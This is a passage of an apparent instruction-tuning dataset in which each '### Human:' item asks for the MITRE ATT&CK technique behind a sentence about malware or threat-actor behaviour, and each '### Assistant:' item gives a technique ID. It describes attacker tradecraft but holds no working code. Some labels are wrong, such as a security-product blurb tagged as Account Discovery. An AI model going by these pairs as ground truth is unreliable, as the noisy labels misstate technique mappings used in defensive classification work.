vulnerable servers.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape searches for the kubectl binary.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POORAIM can conduct file browsing.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry uses attrib +h to make some of its files hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used malware to identify installed software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may collect data related to managed devices from configuration repositories.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BootComplete starts the AutoStartup service and the AutoStartup service makes sure that MainActivity is always running### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CallMe has the capability to create a reverse shell on victims.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has been signed with code-signing certificates such as CodeRipper.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used the NT AUTHORITY\SYSTEM account to create files on Exchange servers.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT is executed using rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FeedBack.php validates the sender by User-Agent, saves the data in the “RAR” server directory and stores the metadata in the mssql database for later reference### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework., regsvcs.exe### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT contains watchdog functionality that ensures its process is always running, else spawns a new instance.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may stage collected data in a central location or directory prior to Exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to identify the system volume information of a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these scans may reveal opportunities for other forms of reconnaissance or Search Open Technical Databases, establishing operational resources or Obtain Capabilities, and/or initial access .### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs establishes persistence by adding a new service with the display name ""WMI Performance Adapter Extension"" in an attempt to masquerade as a legitimate WMI service.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse inter-process communication mechanisms for local code or command execution.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can use VBScript code for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is done via adding a path to a script to the HKCU\Environment\UserInitMprLogonScript Registry key.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete collects stored credentials from several web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell has a command to modify a Registry key.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some data is also base64-encoded.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has a command to download files to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has the ability to download additional files from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 actors used the native at Windows task scheduler tool to use scheduled tasks for execution on a victim network.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider used Base64 encoding to obfuscate an Empire service and PowerShell commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy has a module to harvest pressed keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Example resources include specific websites, email services, DNS, and web-based applications.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has delivered spearphishing emails with malicious attachments to targets.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used emails containing Word, Excel and/or HWP documents in their spearphishing campaigns.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka creates a directory, %USERPROFILE%\AppData\Local\SKC\, which is used to store collected log files.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We suspect the attacker was trying to generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a unified province that included South Korea's Gangwon-do prior to the division of Korea in 1945.A second email contained a story about a person called 'Ewing Kim' who was looking for help:The email's attachments are two different HWP documents, both leveraging same vulnerability (CVE-2013-0808)### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover persists by creating a Registry entry in HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has added credentials to OAuth Applications and Service Principals.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has also targeted exposed kubelets for Kubernetes environments.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IndigoZebra sent spearphishing emails containing malicious password-protected RAR attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used backdoors that can delete files used in an attack from an infected system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The White Company has the ability to delete its malware entirely from the target system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This method makes no changes to the Registry as the COM object is not actually registered, only executed.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has created user accounts and added them to local Admin groups.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This kind of targeted attack is referred to a strategic web compromise or watering hole attack.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu executes additional Jscript code on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT lists the running processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally malware reports itself to its hardcoded command and control servers and established a backdoor connection, so the attacker may have a permanent remote connection### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon can obtain a list of processes running on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In spearphishing, a specific individual, company, or industry will be targeted by the adversary.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT collects the CPU information, OS information, and system language.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has acquired the personal email addresses of some individuals they intend to target.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability CVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk is a ransomware that uses a combination of public and symmetric-key cryptography to encrypt files on the host computer.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type uses Base64 encoding for C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PHOREAL communicates via ICMP for C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use these scripts to maintain persistence on a single system.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can list running processes on the localhost.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has downloaded tools to compromised hosts.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY has been observed using a Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program may be replaced with ""cmd.exe"" .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail can decompress scripts received from C2.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The datasets included: Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Script to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems We analyzed each type of dataset other than the documents containing detailed information on alleged OilRig operators and they remain consistent with previously observed OilRig tactics, techniques, and procedures (TTPs)### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities and vulnerabilities in Adobe Reader and Flash .### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can add or remove applications or ports on the Windows firewall or disable it entirely.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some lure documents used in these attacks are shown below: Decoy documents used in BlackOasis attacks To summarize, we have seen BlackOasis utilizing at least five zero days since June 2015: CVE-2015-5119 – June 2015 CVE-2016-0984 – June 2015 CVE-2016-4117 – May 2016 CVE-2017-8759 – Sept 2017 CVE-2017-11292 – Oct 2017 Attacks Leveraging CVE-2017-11292 The attack begins with the delivery of an Office document, presumably in this instance via e-mail.  Embedded within the document is an ActiveX object which contains the Flash exploit### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DropBook is a Python-based backdoor compiled with PyInstaller.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to extract credential material from the Security Account Manager database either through in-memory techniques or through the Windows Registry where the SAM database is stored.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER can use base64 encoded C2 communications.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa can stop services and processes.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has used the netstat -naop tcp command to display TCP connections on a victim's machine.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,httpclient opens cmd.exe on the victim.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used a forged duo-sid cookie to bypass MFA set on an email account.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nidiran can create a new service named msamger , which mimics the legitimate Microsoft database by the same name.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch has established persistence with a scheduled task impersonating the Outlook item finder.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi binds to a raw socket on a random source port between 31800 and 31900 for C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly has placed trojanized installers on legitimate vendor app stores.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sys10 collects the local IP address of the victim and sends it to the C2.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore can use AppleScript to inject malicious JavaScript into a browser.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are two versions of safe mode: Safe Mode and Safe Mode with Networking.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Traps blocks all of the files currently associated with Gorgon Group   Appendix   Analysis of a targeted attack “1971 Liberation War Freedom Fighters in Pakistan ArmyCustody Database98” The delivery documents used in the targeted attacks are Microsoft Office documents that contain a macro that attempts to compromise the system### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury can exfiltrate SSH credentials through custom DNS queries.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The actors have also disabled proxy settings to allow direct communication from victims to the Internet.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Brave Prince terminates antimalware processes.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control or Exfiltration Over Web Service.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FrameworkPOS can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has used rundll32.exe to execute other DLLs and named pipes.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The White Company has obfuscated their payloads through packing.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools can be open or closed source, free or commercial.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WEBC2 can open an interactive command shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,C2 communication is also updated from prior versions, with the following commands now supported by BADNEWS: Command Description 0 Kill BADNEWS### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used VBScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of its file stealers has also persisted by adding a Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia can perform microphone recording.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has used process hollowing to inject itself into legitimate Windows process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 created tokens using compromised SAML signing certificates.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 leveraged Sysmon to understand the processes, services in the organization.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBK can extract a malicious Portable Executable from a photo.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka is capable of keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 maintains access to victim environments by using FLIPSIDE to create a proxy for a backup RDP tunnel.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAMMERTOSS is known to use PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors have also enumerated processes associated with specific open ports or named pipes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus encodes C2 communications in Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework., TeamViewer ### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA lists the system’s processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CPL files### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has created hidden folders.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SSL/TLS certificates are designed to instill trust.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail can instruct the OS to execute an application without a dock icon or menu.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has decrypted a binary blob to start execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has searched for security products on infected machines.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can identify targets by querying account groups on a domain contoller.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can use encrypted string blocks for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used net time to check the local time on a target system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has a HWP document stealer module which changes the default program association in the registry to open HWP documents.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Others incorporate a seed value as well to make predicting future domains more difficult for defenders.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal can launch cmd.exe to execute commands on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can break large files of interest into smaller chunks to prepare them for exfiltration.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 created and modified startup files for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d)  contains the following formula that Excel will save to the “A0” cell in the worksheet: The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has operated from leased virtual private servers in the United States.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,P2P ZeuS added junk data to outgoing UDP packets to peer implants.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to use HTTP in communication with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HALFBAKED can obtain information about the OS, processor, and BIOS.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can start a remote shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type uses Base64 encoding for C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used mshta.exe for code execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet reduces the integrity level of objects to allow write actions.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For DoS attacks targeting the hosting system directly, see Endpoint Denial of Service.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats used PowerShell implants on target machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used command-line interfaces for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.### Assistant: T1612: Build Image on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can collect IP information from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS .### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has used a secondary C2 location if the first was unavailable.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from 